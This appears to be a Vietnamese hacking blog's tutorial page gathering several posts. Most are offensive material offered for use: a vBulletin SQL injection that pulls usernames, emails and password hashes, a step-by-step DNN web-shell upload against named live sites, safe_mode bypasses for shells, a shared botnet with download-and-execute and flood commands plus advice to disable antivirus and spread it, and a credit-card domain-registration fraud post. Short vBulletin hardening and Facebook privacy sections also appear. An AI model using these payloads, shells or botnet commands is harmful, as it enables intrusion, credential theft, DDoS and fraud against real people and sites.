Showing posts with label TUTORIALS. Show all posts
Showing posts with label TUTORIALS. Show all posts

Ebooks Hacking Chọn Lọc

Trong quá trình tìm hiểu Hacking, sau đây là những ebook hay, được soleil đánh giá cao và muốn chia sẻ. 

1 – Tài liệu hướng dẫn sử dụng BackTrack 5 – Version tiếng viêtk

Tài liệu này được viết bởi cutynhangheo   - Admin HCE theo kiểu biên dịch lại từ Ebook tiếng anh. Tuy chỉ nói lên 1 phần nhỏ của công cụ hack kinh điển backtrack nhưng khá bổ ích đối với các bạn đang bắt đầu tìm hiểu về Backtrack.

2 –  Tấn công và bảo vệ hệ thống


Ebook này được viết bởi giảng viên TT Itrain – Chuyên gia bảo mật hàng đầu tại VN - tocbatdat. Với tư duy loric, kiến thức thâm hậu, cách viết rõ ràng, chi tiết. Độc giả có thể dễ dàng hiểu và nắm bắt bản chất các vấn đề xoay quanh: Nguyên tắc scan port, nguyên lý truyền tin, DDos-Botnet – Trojan-Backdoor, Gmail Hacking, Website Hacking ...

3 –  Elite Collection HVA

Ebook này được tổng hợp lại bằng phần mền – bao gồm tất các các tài liệu của nhóm Hacker hàng đầu Việt Nam – HVA với tất cả các vấn đề cơ bản xoay quanh, liên quan đến bản chất Hacking như: Unix, Lunix, Windown, Registry, How to be a Hacker...

4 –  Ghi Nhớ Ubuntu

Ebook ghi nhớ  các lênh trong hệ điều hành linux – Ubuntu – Cái không thể không biết khi nghiên cứu, tìm hiểu về hacking. Ebook tổng hợp khá chi tiêt và đầy đủ các câu lệnh.

5 - The Hacker's Underground Handbook

Cuốn Ebook về hacking nước ngoài, viết về các vấn đề xoay quanh hacking như : programming, linux, password, Network Hacking, Wireless Hacking, Windown Hacking, Malware, WebsiteHacking. Cuốn ebook khá hay và chi tiết – Có cách nhìn tổng thể về hacking. Giá bán trên thị trướng khoảng vài trăm dolla.

1 số Ebook khác:

  -          Ebook Group HCE - Hacking + Crack = Enjoin

  -          Ebook Group BYG – BeYeuGroup

  -          CEH version tiêng việt

  -          The Web Application Hacker’s Handbook

  -          Hacker Web Exploitation

  -          CEH V.7 - Certified Ethical Hacker

  -          CHFI  - Computer Hacking Forensic Investigator
http://www.mediafire.com/?4kwnoo0jji5p95v  

  -     Ebook SQLI- Editor by Headshot

Tất cả các password download là: soleil_vhb 

bug search vbb 4.0.x => 4.1.2





lỗi này vẫn còn 1 số diễn đàn 


==================================================
==================
#vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
================================================== ==================
# #
# 888 d8 888 _ 888 ,d d8 #
# e88~\888 d88 888-~\ 888 e~ ~ 888-~88e ,d888 _d88__ #
# d888 888 d888 888 888d8b 888 888b 888 888 #
# 8888 888 / 888 888 888Y88b 888 8888 888 888 #
# Y888 888 /__888__ 888 888 Y88b 888 888P 888 888 #
# "88_/888 888 888 888 Y88b 888-_88" 888 "88_/ #
# #
================================================== ==================
#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
================================================== ==================

#[+] Discovered By : D4rkB1t
#[+] Site : NaN
#[+] support e-mail : d4rkb1t@live.com


Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"

--------------------------
# ~Vulnerable Codes~ #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;

--------------------------
# ~Exploit~ #
--------------------------
POST data on "Search Multiple Content Types" => "groups"

&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#

More info: http://j0hnx3r.org/?p=818

--------------------------
# ~Advice~ #
--------------------------
Vendor already released a patch on vb#4.1.3.
UPDATE NOW!

================================================== 
==================
# 1337day.com [2011-5-21]
==================================================
==================



TUT hướng dẫn : http://www.youtube.com/watch?feature=player_embedded&v=ncWxHDhRKS0#!

Demo Hack Web Bằng Kỹ Thuật DNN (DotNet Nuke)

Bước 1: Sử dụng google để tìm site chứa lỗ hổng DNN
:inurl:/tabid/36/language/en-US/Default.aspx
Inurl:”/portals/0” 
Bước 2: Chọn  1 victim bất kỳ, ví dụ:
Bước 3: Thay thế đoạn url sau:
/tabid/36/language/en-US/Default.aspx
Bằng đoạn mã url:
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Lúc đó, đường link của victim như sau:

Thông tin thu được:




 
Bước 4: Tích vào File (A File on your site)
     

Sau đó thay thế đường link  bằng đoạn mã Script đơn giản sau:
javascript:__doPostBack('ctlURL$cmdUpload','') 

Sau khi chạy địa chỉ url ở trên sẽ xuất hiện giao diện cho upload file
Bước 5: Upload shell
Click Browse và upload shell .asp or. aspx


Thêm 1 số kỹ thuật upload shell đối với asp,
- Có thể bypass đuôi file shell sang dạng ảnh như sau: shell.asp;.jpg.
- Hoặc sử dụng tool http live herder or tamper data….
Bước 6: Run shell
Path đường dẫn để http://www.victim.com.vn//portals/0/tên shell
Một số site dính DNN:
http://www.seth.pt/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Bộ Ebook cực hiếm dành cho dân CNTT!

Đây là Ebook CNTT toàn tập là hàng hiếm của dân CNTT đó anh em,dành cho những ai thích công nghệ thông tin thì tham khảo. Trong này chứa hầu như tất cả những món nghề của dân CNTT.
 
Mời các bạn download:
http://www.mediafire.com/?t3yzw8cnq4qfs

TUT - Làm gì khi safe_mode ON?

Khi gặp Safe_mode: ON thường ae ko làm được gì (ý nói newbie á). Jin lập Tut này hướng dẫn ae local khi gặp trường hợp này.
-- Bắt đầu nha --
I. Hạ safe_mode
Thử các cách sau:
a. Tạo file .htaccess ở root với nội dung sau:


Code:
php_flag safe_mode off
b. Tạo file php.ini ở root với nội dung sau:
Code:
safe_mode = Off
c. Thêm đoạn code sau vào file cấu hình như config.php , data.php , global.php ,.. ( sau <?php nhé )
Code:
ini_set('safe_mode','Off');
Sau khi hạ safe_mode xong thì local như thường nhé.
II. Perl Shell
Nếu vì lí do nào đó mà bạn ko hạ sm được thì dùng thử Perl Shell nha. Perl Shell là shell (tất nhiên rùi) thường có đuôi dạng .cgi , .pl ,.. Và ko bị ảnh hưởng bởi cái sm quái qủy kia.
Download: http://www.hyperfileshare.com/d/1508da2e
Upload shell to host, ChMod 755 và run thử.
Nếu gặp lỗi 500 thì ta xem Tut này: http://www.mediafire.com/?mmnimgwmjt0 (mượn tạm của pro nào ý)
và Tut này http://www.mediafire.com/?qqwkoiozrdq
nếu ko được nữa thì move shell vào folder cgi-bin .
Cuối cùng, áp dụng hết pp trên mà ko được nữa thì... Bỏ con shell ấy đi. Hại não. Hìhì

Hướng dẫn sử dụng VPS

VPS là gì?

Server riêng ảo (Virtual Private Server - VPS) là phương pháp phân chia một server vật lý thành nhiều server riêng. Mỗi server là một hệ thống hoàn toàn riêng biệt, chạy hệ điều hành riêng có toàn quyền quản lý và khởi động lại hệ thống.
VPS dành cho các doanh nghiệp vừa và nhỏ cần có server riêng có thể quản trị từ xa, có thể cài đặt phần mềm theo nhu cầu mà không bị hạn chế, có thể xây dựng server web, email, backup dữ liệu hoặc dùng để truyền tải file dữ liệu giữa các chi nhánh một cách dễ dàng, nhanh chóng, bảo mật.


VPS giống như một máy tính bình thường mình sử dụng nhưng nó được đặt ở các phòng server có đường truyền mạnh và cấu hình ngon

Sau đây mình sẽ nói sơ qua về vps và hướng dẫn cách sử dụng (Mình chỉ nói theo kinh nghiệm có gì sai sót mong các bạn góp ý và bỏ qua)

1. Cách sử dụng
Đầu tiên các bạn tìm đến chức năng remote desktop của win (Mình dùng win xp)
 C:\Documents and Settings\All Users\Start Menu\Programs\Accessories\Communications

Cho cái biểu tượng Remote Desktop Connection ra màn hình desktop bằng cách bấm save as

Nháy đúp vào biểu tượng Remote Desktop Connection

Copy và paste Computer vào ô như trong hình:




Nó sẽ Remote desktop đến cái VPS của các bạn.

Cách bạn cứ hiểu VPS như là 1 cái máy tính. Mà đã là máy tính thì cách bạn cứ làm những gì mà cách bạn làm trên máy tính của bạn (nhưng phải có giới hạn)

Bây giờ các bạn có thể làm gì tùy thích như cắm game, chạy game server, web server, crack,scan socks, leech socks, ddos site, ....


Chú ý : Các bạn đừng bao giờ tắt máy cái VPS như tắt máy của mình nhá nó đi luôn đấy. Nếu dùng xong tắt cái remote đi là được rồi (dấu X) nó vẫn đang online trên mạng đấy.

Sau khi remote đc VPS thì dùng TeamViewer để connect vào cũng ok.
2. Cách đổi password cho vps
Trong giao diện của vps chọn start >> windows security >> change password rồi nhập password cũ và mới vào
3. Cách reset cho vps
VPS như một máy tính ảo nên khi làm việc lâu quá cũng không tốt nên cứ khoảng 1-2 ngày bạn nên reset một lần

Cách làm như sau
 Rồi bấm oke, khoảng 5 phút sau vào lại

4. Cách khắc phục lỗi exceed
Mặc định, trên Windows Server 2003, chức năng Remote Desktop được thực hiện ở mode Remote Desktop for Administration. Với mode này, nó chỉ cho phép 2 connections mà thôi. Chúng ta không thể remote vào vượt quá số connections này được đâu. Bạn có thể kiểm chứng điều này bằng cách vào Administrative Tools ==> Terminal Services Configuration ==> click Connections , nhấn phải chuột trên RDP-TCP chọn Properties ==> Chọn tab Network Adapter, bạn sẽ thấy Maximum connections là 2

Nếu một khi bạn vào vps nhưng khi mạng của bạn bị lag bạn chưa hòan toàn thoát ra khỏi vps tức là 1 user còn đang sử dụng, bạn lại nóng lòng login lại và lại lặp lại vấn đề như vậy nên cùng một lúc bạn sử dụng nhiều user lúc đó vps báo lỗi quá tải (the terminal server has exceeded the maximum number of allowed connections).

Ở Remote desktop có 2 chế đó là Remote desktop và Remote desktop console. 2 kiểu remote này là khác nhau. Remote desktop bình thường thì coi như bạn tạo ra 1 tài khoản, còn Remote desktop console thì bạn chạy thực trên con máy đó. Lý do bị như vậy là chúng ta đang Remote Desktop console trên cùng 1 server VPS. Hãy tạo ra 1 Remote Desktop thường và 1 Remote Desktop console. Lúc này ta nên vào chế độ console bằng cách:

Start -> Run -> mstsc /console đánh IP và password vào như đăng nhập vps thông thường rồi reset lại vps thế là xong

5. Những chú ý khi sử dụng vps
- VPS sử dụng mạng nước ngoài nên bạn có tắt máy thì nó vẫn họat động
- Không nên lạm dụng vps, bạn không thể bắt nó làm việc quá mức và nó sẽ die nhanh
- Khi mang bạn lag bạn nên hạn chế conect vào vps, tốt nhất là tắt đi khi xong công việc.

Học php qua video :)) căn bản php. đến nâng cao.

Dưới đây là tổng hợp video từ cơ bản nhất đến nâng cao với giọng tiếng việt dễ hiểu của anh
Demon Warlock

sau đây là links

bài 1 : http://vimeo.com/15013115

bài 2 : http://vimeo.com/15013447

bài 3 : http://vimeo.com/15015284

bài 4 phần 1: http://vimeo.com/15015464

bài 4 phần 2: http://vimeo.com/15014929

bài 5 phần 1: http://vimeo.com/15015037

bài 5 phần 2 : http://vimeo.com/15015134

bài 6 phần 1 : http://vimeo.com/15016637

bài 6 phần 2 : http://vimeo.com/16646679

bài 7 phần 1 :http://vimeo.com/15017026

bài 7 phần 2 : http://vimeo.com/15159496

bài 8 : http://vimeo.com/15031002

bài 9 phần 1 : http://vimeo.com/15031302

bài 9 phần 2 : http://vimeo.com/15031537

bài 10 : http://vimeo.com/15043585

bài 11 phần 1 : http://vimeo.com/15146610

bài 11 phần 2 : http://vimeo.com/15972696

bài 12 : Mô hình MVC http://vimeo.com/17140642

Reg Domain CCN

đã chơi chơi hẳn site chính cho máu, ko chơi reseller

socks: tuỳ
mail: mình dùng gmail
Victim: http://www.planetdomain.com/
demo: http://whois.domaintools.com/vungockhanh.com

This image has been resized.Click to view original image

Share + Hướng Dẫn Sử Dụng code Botnet Của Nik3

Modules attack:

.download http://host.com/exe.exe; Download -> Execute file
.update http://host.com/exe.exe; Update bots
.httpflood http://host.com/script.php|10; Start HTTP flood
.oldhttpflood http://host.com/script.php|10; Start HTTP/HTTPS flood
.posthttpflood http://host.com/s.php?l=1|10; Start POST flood
.icmpflood http://host.com/script.php|10; Start ICMP flood
.synflood 127.0.0.1:80|10; Start SYN flood
.udpflood 127.0.0.1:80|10; Start UDP flood
.stop 0; Stop

Demo: http://goldbank.vn/xx/index.php

Hướng dẫn đôi chút về sử dụng code botnet này.

Bước 1: các bạn down code về trong foder xx các bạn edit config sao cho trùng vs host của mình rồi import file zero-bot.sql vào phpMyAdmin

Bước 2: Các bạn bấm vào foder Tạo Bot rồi bấm vào file active.exe sau đó bấm vào file zero.exe như hình này:


Bước 3: Sau khi Build xong thì các bạn copy file bin.exe.exe đó chính là file bot. Còn lại các bạn tự tìm hiểu cách phát tán bot nhé.

P/S: http://goldbank.vn/xx/index.php đường dẫn này là index 404 nên bấm nút tab để login nhé!

Download: (Lưu ý: Tắt các anti virus có thể. - Vì sao à? Bot nó là virus chứ là cái gì nữa, ai không tin tưởng thì khỏi phải dùng).

http://www.mediafire.com/?5999c6g6nk80dls
          http://www.mediafire.com/?kda3dhq3g1l1ycj
Pass Unrar: zero

Lưu ý: Code này nhập victim botnet đến 5-10p sau sẽ có tác dụng nhé đừng nóng lòng.

[TUT] Bug validator.php trong vBulletin

TUT hướng dẫn bug tấn công vào icare.com.vn qua file Validator.php
Tác Giả: Nobody

Link down:


http://www.mediafire.com/?ntrngjdzczj
Đây cùng do sự bất cẩn của admin quên chưa xóa fle Validator.php file này có khả năng view hệ các file và thư mục của vBB.

Tài liệu an ninh mạng và kĩ thật tấn công trojan and backdoor









      Password: nếu có: kenhdaihoc.com

Book+ shell+ video+ tools [Newbie]


http://www.mediafire.com/?83m6n423zws9o#djh8h0y150m55
Chia sẻ cho ae newbie 1 kho tài liệu lập trình, local,...

Tổng Hợp Những Gì Cần Thiết Nhất Cho NewBie Từ Cơ Bản Đến Nâng Cao

Tổng Hợp Những Gì Cần Thiết Nhất Cho NewBie Từ Cơ Bản Đến Nâng Cao









Nguồn Các Thành Viên Xgroup:
http://www.mediafire.com/?obqcq1tqomskc

Nhận dạng các loại mã hóa

1.MySQL có 2 loại
60671c896665c3fa MySQL loại 16 kí tự
667f407de7c6ad07358fa38daed7828a72014b4e MySQL5 loại 40 kí tự
2.MD4 có 3 loại:
bde52cb31de33e46245e05fbdbd6fb24 MD4 loại này 32 kí tự
a0f0057303393f643a09d7db430b9fe1 MD4 (HMAC*) 32 kí tự
veUssx3jPkYkXgX729b7JA==Z7g= MD4 (Base64*) Loại này dạng base64 có 28 kí tự
3.MD5 có tới 5 dạng:

0cc175b9c0f1b6a831c399e269772661 MD5 32 kí tự

3673438f11d71c21a9b8b59232a3dd61 MD5 (HMAC) 32 dạng HMAC 32 kí tự

DMF1ucDxtqgxw5niaXcmYQ==Z7g= MD5 (Base64) 28 Kí tự

$1$$Ij31LCAysPM23KuPlm1wA/ MD5 (Unix) 26 kí tự

$apr1$$ny0TwGBt5/BPT4.mbWBKk. MD5 (APR) 29 kí tự.
4.MSCash
9bea8ee5c345f595cd9f9b37a1a2a887 MSCash 32 kí tự
86f7e437faa5a7fce15d1ddcb9eaeaea377667b8
5.SHA-1 có 2 loại:
7f984109f39759f3f41dba04f5183741e36f1445 Sha-1 (HMAC) 40 kí tự
hvfkN/qlp/zhXR3cuerq6jd2Z7g= Sha-1 (Base64) 28 kí tự

10 cách bảo mật cho vBB

Hiện nay Tin học ở Việt Nam chúng ta phát triển mạnh mẽ , Các Website cá nhân, các diễn đàn (forum) nhiều vô kể. Tất nhiên từ đó sinh ra các hacker hoặc là anh chàng mới chập chững vào nghề mò mẫm tìm các phiên bản còn lỗi của các ứng dụng Web như shopping Online, các loại forum viết bằng ngôn ngữ PHP rong đó phải kể đến sự hiện diện của hai loại forum phổ biến nhất có thể nói trên toàn thế giới là Invision Board Forum(IBF) và Vbulletin Board (VBB).



Với nội dung khá phong phú, đó có thể là một nơi trao đổi của học sinh các trường phổ thông hay một nhóm người, một tổ chức hacker ,…Có những forum chuyên về hacking và bảo mật, âm nhạc, giao lưu học hỏi, …nói chung là đa dạng và phong phú.
Nhưng bảo mật đang là vấn đề bức bách của mỗi website, làm sao để có thể chống lại sự tấn công , làm sao để yên tâm trước sự đe dọa của mũ đen tin học.
Bài viết này tôi hi vọng sẽ góp phần nào cho công việc bảo mật của các Webmaster với hai ứng dụng IBF và VBB.

1. Chống Hack Local:
Hack local là nổi ám ảnh của các diễn đàn, đây là phương pháp hack khá dễ và độ thành công của nó rất cao.

Hacker tấn công theo phương pháp trên bằng cách nào? Đầu tiên họ sẽ làm thế nào đó để có thể có một hosting trên cùng server với hosting của bạn( mua bằng thẻ tín dụng, hay mua bằng tiền mặt). Sau đó sẽ upload lên host của họ một con remview.php (script này do nhóm hacker Nga viết). Họ sẽ chạy script này trên IE ví dụ: http://xxx.com/remview.php ; với tác dụng của script này , nó có thể xem toàn bộ các user trên Server đó, thậm chí có thể xem nội dung từng file trong các user này. Đối với forum IBF thì hacker xem nội dung file conf_global.php và forum VBB thì xem nội dung file config.php trong thư mục Includes, đây là 2 file chưa các thông tin về cơ sở dữ liệu trong forum của bạn. Như vậy là họ biết các thông số về Cơ sở dữ liệu trong forum (user DB,PassDB , Dbname). Qua đây hacker có thể khai thác tài nguyên bằng cách chạy một forum cùng chung Database với forum của bạn, và có thể Drop (xóa) tất cả Dữ liệu trong forum bạn.

Để chống lại cách hack local bạn cần phải làm thế nào đó cho các hacker không thể xem được nội dung của những file chứa thông tin cơ sở dữ liệu. ChMod là một phương pháp tốt để chống nó. ChMod các thư mục các file trong thư mục Forum. ChMod là thay đổi thuộc tính của thư mục, file nó cho phép người khác có thể xem , đọc, sửa chửa các file của bạn hay không.

Đầu tiên ChMod thư mục Public_html thành 710 hoặc 711(nếu Server cho phép). Bạn Chmod tất cả các thư mục thành 755, tiếp theo sau đó đối với forum IBF thì Chmod file conf_global.php và đối với forum VBB thì chmod file config.php thành 644. Như vậy hacker không thể xem nội dung 2 file quan trọng trên.

Thêm một phương pháp nữa là bạn mã hóa (Zencode) nội dung cả hai file trên. Phương pháp này rất an toàn nhưng có hạn chế là nếu bạn quên các thông tin về cơ sở dữ liệu thì không thể nào lấy lại được , có thể tham khảo tại Welcome to Zencode

2. Đổi tên , xóa các thư mục, dùng file robots.txt:
Các chương trình Scan Web có thể xem cấu trúc website của bạn, nhằm chống và hạn chế thì bạn có thể tham khảo các cách sau:
Đối với Forum VBB thì bạn tiến hành đổi tên thư mục AdminCP, ModCP trong file config.php. Bạn tìm và thay thế hai từ trên thành tên bất kì. Sau đó sẽ đổi tên cả hai thư mục đó thành tên mà bạn đã đổi trong file config.php
Xóa các thư mục: Đối với hai loại forum trên thì bạn nên xóa thư mục install khi đã cài đặt xong.

Xóa file: Nếu bạn đang sử dụng forum IBF phiên bản 1.3 thì xóa file: ssi.php và vì hacker có thể chiếm đoạt quyền Admin thông qua file ssi.php
Dùng file robots.txt: cách viết và sử dụng file này đã đăng trên nhiều số báo của Echip, bạn có thể xem lại

3. Không nên cập nhật ngay các phiên bản mới nhất:
Bởi các nhà viết Source không nhận ra các lỗi trong phiên bản này nên bạn cần lưu ý, trong quá trình sử dụng nên chọn phiên bản đã bảo mật tốt, không bị các lỗi để hacker khai thác. Sau khi họ đã cập nhật cách sửa lỗi thì lúc đó bạn Upgrade lên cũng chưa muộn.

4. Không nên hack quá nhiều Mod:
Đối với hai loại Forum phổ biến trên thì cập nhật thêm các công dụng rất nhiều, cũng chính trong quá trình đó phát sinh ra nhiều lỗi kĩ thuật (bug), bạn chỉ nên cập nhật các Mod cần thiết cho forum của mình.

5. Chống flood cho diễn đàn :
Ở hai loại forum này đã có các chế độ chống flood. Bắt buộc phải xác nhận ảnh (gồm chuổi chữ, số khi đăng kí. Định thời gian log out. Vì vậy bạn nên Enable các chức năng này trong Admin Control Panel .

6. Không cho sử dụng một số từ trong bài viết của thành viên:
Bạn nên bỏ chức năng sử dụng tag (thẻ html trong bài viết vì qua đây có thể lấy được ****** của thành viên khác.
Loại bỏ một số từ, kí tự: “,” , “;”, “//”, “/”.

7. Xóa ****** lần nữa khi đã logout:
Mặc dù cả hai loại forum trên đã có chế độ tự động xóa ****** mỗi khi thành viên log out nhưng nó thường xuyên bị lỗi, do vậy sau khi đã logout tốt nhất bạn nên vào Internet Option sau đó chọn Delete ******.

8. Gỡ bỏ chương trình Upload bằng FTP:
Một số chương trình sẽ lưu lại Username và mật khẩu của bạn nên sau khi đã hoàn thành Upload các file cần thiết lên thư mục nào đó trong forum bạn nên gỡ bỏ các chương trình này, vào Add/Remove Program để thực hiện chức năng này

9. Đặt file index.html hoặc file .htpasswd trong thư mục dành riêng cho nhóm người nào đó:
Đây là phương pháp ngăn không cho mọi người có thể tự động khai thác tài nguyên một cách vô tư , đồ “quý hiếm” dành cho một nhóm người nào đó trong Diễn đàn.
Bạn có thể tạo một file index.html với nội dung bất kì hoặc để trống , sau đó upload lên thư mục cần bảo mật.
Thứ hai là có thể đặt file .htpasswd với mật khẩu chỉ dành riêng cho nhóm người đó trong thư mục cần bảo mật.
Như trang này chúng ta có thể xem các công cụ hack của họ một cách thoải mái:
Nhanhoa.com - Offline

10. Thường xuyên vào các Website Bảo mật để xem thêm thông tin và cách khắc phục các lỗi cho Diễn đàn của mình.

5 mẹo bảo mật thông tin cá nhân trên Facebook bạn nên biết

Thường xuyên sử dụng Facebook để cập nhật và chia sẻ thông tin với bạn bè, nhưng bạn có quan tâm đến việc bảo mật thông tin cá nhân của mình? Top 5 cách thiết lập sau sẽ giúp bạn “cài then” vững chắc cho tài khoản Facebook của mình, tránh để các thông tin cá nhân bị lộ ra ngoài.
Nhiều người khi sử dụng Facebook thường ít quan tâm đến vấn đề bảo mật và khá phóng khoáng trong việc chia sẻ thông tin, hình ảnh hay truy cập ứng dụng bừa bãi. Khi được cấp phép, một số ứng dụng có thể lấy cắp thông tin cá nhân của bạn để phục vụ cho mục đích khác. Điển hình là ứng dụng Girls Around Me giúp bạn “tìm gái” trong phạm vi gần nhất. Ứng dụng đã lấy cắp thông tin địa điểm từ Foursquare và hình ảnh từ Facebook để hiển thị những phụ nữ đang ở gần bạn. Dù Girls Around Me đã bị buộc ngừng hoạt động song đó cũng là “lời cảnh tỉnh” cho những người thường chia sẻ thông tin trên Facebook.
Năm lời khuyên sau của nhà phân tích bảo mật Sarah Downey sẽ giúp bạn an toàn hơn. Mọi thiết lập để bảo vệ thông tin cá nhân đều nằm tại trang Privacy Settings (http://www.facebook.com/settings/?tab=privacy).
1. Chỉ chia sẻ thông tin cho bạn bè
Downey khuyến nghị người dùng chỉ nên chia sẻ thông tin cho bạn bè ở chế độ “friends only”. Downey cho biết “Nếu chia sẻ ở chế độ ‘friends of friends’, thông tin của bạn sẽ phơi bày trước trung bình 150.000 người khác. Các dữ liệu này lộ ra ngoài sẽ lọt vào các ứng dụng đáng sợ, mà điển hình là Girls Around Me và Spokeo.com”.
Để đổi chế độ chia sẻ sang “friends only”, bạn vào trang Privacy Settings, chọn chế độ Friends hay Custom.
Khi chọn Custom, bạn nhớ bỏ chọn tại mục Friends of those tagged. Nếu đánh dấu vào mục này nghĩa là bạn cho phép những người được tag trong tin được chia sẻ tin đến bạn bè của họ.
2. Đừng để bạn bè chia sẻ thông tin của bạn
Bạn nên cẩn thận với ứng dụng dạng như BranchOut. Được giới thiệu sẽ giúp xây dựng mạng lưới nghề nghiệp trên Facebook, BranchOut sẽ truy cập vào các thông tin về nghề nghiệp, học vấn, nơi ở của bạn. Và không cần bạn cho phép, ứng dụng cũng sẽ xem được các thông tin từ những người bạn của bạn.
Do vậy, nếu bạn bè của bạn có sử dụng các ứng dụng tựa như BranchOut thì thông tin của bạn cũng không an toàn. Ngoài việc hạn chế kết bạn với những người không quen biết, thiết lập sau sẽ giúp tài khoản của bạn không bị các ứng dụng xâm nhập trái phép. Tại trang Privacy Settings, bạn nhấn Edit Settings tại mục Apps and Websites. Kế đến, bạn nhấn Edit Settings tại trường How people bring your info to apps they use rồi bỏ chọn tại tất cả các ô. Xong, bạn nhấn Save Changes để lưu lại.
3. Cẩn thận với tính năng Tag
Các mạng xã hội như Facebook và Google+ đều có tính năng nhận diện khuôn mặt để tag những người có liên quan vào ảnh. Không như Google+ cho phép người dùng tự chọn bật tắt tính năng nhận diện khuôn mặt, Facebook sẽ tự động nhận diện sau khi bạn upload ảnh lên và gợi ý cho người dùng. Tính năng “tag suggestions” trên Facebook sẽ đưa ra gợi ý về các khuôn mặt trong ảnh. Nếu một người upload ảnh có khuôn mặt bạn trong đó, họ sẽ nhận được gợi ý tag bạn vào ảnh. Để không bị tag vào ảnh của những người xa lạ, bạn nhấn Edit Settings tại Timeline and Tagging, nhấn Who sees tag suggestions when photos that look like you are uploaded và chọn No One.
Hoặc bạn có thể bật tính năng Tag Review để kiểm duyệt trước khi được tag vào hình ảnh hay bài viết. Chỉ khi được cho phép, bạn mới được tag vào bài hay ảnh của người khác.
4. Chọn lại chế độ chia sẻ cho các bài đăng cũ
Khi chuyển sang Timeline, một số bài đăng cũ của bạn có thể sẽ hiện diện trước mọi người. Để thiết lập lại chỉ cho bạn bè xem, bạn nhấn Manage Past Post Visibility tại Limit the Audience for Past Posts, chọn Limit Old Posts. Sau đó, toàn bộ bài đăng cũ được chia sẻ ở chế độ “public” hay “friends of friends” đều được chỉnh lại thành “friends”.
5. Tắt tính năng Subscribe
Tính năng Subscribe cho phép mọi người không phải bạn bè có thể theo dõi tin trên trang cá nhân của bạn. Nếu không muốn mọi thông tin đăng lên đều được chia sẻ với các “subcriber” xa lạ, bạn nên tắt tính năng này đi.
Nếu đã lỡ bật tính năng Subscribe, bạn vào Account Settings, chọn thẻ Subscribers (hay truy cập trực tiếp vào đây). Bạn bỏ chọn tại dòng Allow Subscribers để tắt tính năng Subscribe đi.
Downey cho biết “Nếu bạn không tắt Subscribe, mọi thông tin mà bạn chia sẻ ở chế độ “public” sẽ hiện diện trên các bộ máy tìm kiếm và sẽ được tìm thấy rất dễ dàng”.
Tham khảo: ReadWriteWeb

[SQL] Maximark.com.vn

Download: http://www.mediafire.com/?rwnc9ij0fwi41dw

SQl 10 Phút

Linux:


 


                                                                 windown



Xem file config = SQL injection

Video hack shop cho newbie

Download: http://www.mediafire.com/?i36rq4864dum4at